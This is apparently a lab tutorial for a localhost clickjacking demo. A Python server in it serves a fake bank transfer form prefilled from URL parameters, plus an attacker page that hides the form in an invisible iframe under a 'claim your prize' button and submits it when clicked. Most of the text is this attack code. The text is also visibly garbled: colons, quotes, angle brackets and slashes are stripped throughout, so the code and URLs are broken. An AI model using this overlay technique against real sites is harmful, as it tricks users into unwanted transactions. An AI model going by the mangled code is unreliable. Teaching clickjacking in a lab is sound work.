 Clickjacking with Form Input
# Data Prefilled from URL Parameter



# ======================================
# STEP 1
# Create Project Folder
# ======================================

mkdir clickjack-demo
cd clickjack-demo


# ======================================
# STEP 2
# Create Files
# ======================================

New-Item app.py -ItemType File
New-Item victim.html -ItemType File
New-Item success.html -ItemType File


# ======================================
# STEP 3
# Open Project in VS Code
# ======================================

code .


# ======================================
# STEP 4
# Open app.py
# ======================================

from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse, parse_qs

class Handler(BaseHTTPRequestHandler)

    def do_GET(self)
        parsed = urlparse(self.path)
        params = parse_qs(parsed.query)

        def get(key)
            return params.get(key, [''])[0]

        if parsed.path == 'victim'
            name    = get('name')
            account = get('account')
            amount  = get('amount')

            html = f!DOCTYPE html
html
headtitleBank Transfertitlehead
body
h2Bank Fund Transferh2
form action=success method=GET target=_top
    Namebr
    input type=text name=name value={name}brbr
    Account Nobr
    input type=text name=account value={account}brbr
    Amountbr
    input type=text name=amount value={amount}brbr
    input type=submit value=Transfer Now
form
body
html

        elif parsed.path == 'success'
            name    = get('name')
            account = get('account')
            amount  = get('amount')

            html = f!DOCTYPE html
html
headtitleTransfer Donetitlehead
body
h2 style=colorgreen;Transfer Successful!h2
pName {name}p
pAccount {account}p
pAmount Rs.{amount}p
br
p style=colorred;Victim had no idea. They clicked a prize button.p
body
html

        elif parsed.path == 'attacker'
            html = !DOCTYPE html
html
head
    titleFree Prize!title
    style
        #wrapper {
            position relative;
            width 350px;
            height 220px;
        }
        #decoy {
            position absolute;
            top 0; left 0;
            width 350px;
            height 220px;
            background yellow;
            text-align center;
            padding-top 80px;
            font-size 18px;
            cursor pointer;
            z-index 2;
            box-sizing border-box;
        }
        #victim-frame {
            position absolute;
            top 0; left 0;
            width 350px;
            height 220px;
            opacity 0.00001;
            z-index 1;
            border none;
        }
    style
head
body
h2Attacker Pageh2
pUser sees yellow button. Hidden bank form is behind it.p
div id=wrapper
    iframe
        id=victim-frame
        src=http127.0.0.18000victimname=Mohammed&account=9876543210&amount=50000
    iframe
    div id=decoy onclick=submitForm()
        Click here to claim your prize!
    div
div
script
    function submitForm() {
        var iframe = document.getElementById('victim-frame');
        var doc = iframe.contentDocument  iframe.contentWindow.document;
        doc.querySelector('form').submit();
    }
script
body
html

        else
            html = h2Go to attacker or victimh2

        self.send_response(200)
        self.send_header('Content-type', 'texthtml')
        self.end_headers()
        self.wfile.write(html.encode())

    def log_message(self, format, args)
        print(f  REQUEST {args[0]})

print(Server started at http127.0.0.18000)
HTTPServer(('', 8000), Handler).serve_forever()


# ======================================
# STEP 5
# Run the Server
# ======================================

python app.py


# ======================================
# STEP 6
# Open Victim Page in Browser
# ======================================

http127.0.0.18000victimname=Mohammed&account=9876543210&amount=50000


# ======================================
# STEP 7
# Open Attacker Page in Browser
# ======================================

http127.0.0.18000attacker


# ======================================
# STEP 8
# Click the Yellow Button
# ======================================

User sees Click here to claim your prize!
Behind it  Bank form prefilled with attacker data (invisible iframe)
On click   Form submits to success page


# ======================================
# OUTPUT
# ======================================

Victim Page   Form fields prefilled using URL parameters.
Attacker Page User sees yellow prize button.
               Invisible iframe loads the bank form behind it.
               On click, form submits silently.
Success Page  Shows transferred Name, Account, Amount.
               Confirms clickjacking worked.


# ======================================
# FEATURES USED
# ======================================

1. Python HTTP Server
2. URL Parameters
3. parse_qs() to read parameters
4. HTML Forms with Prefilled Values
5. iframe Overlay Technique
6. opacity to hide iframe
7. z-index Layering
8. onclick to submit hidden form
9. target=_top to load result in main window
10. Clickjacking Attack Simulation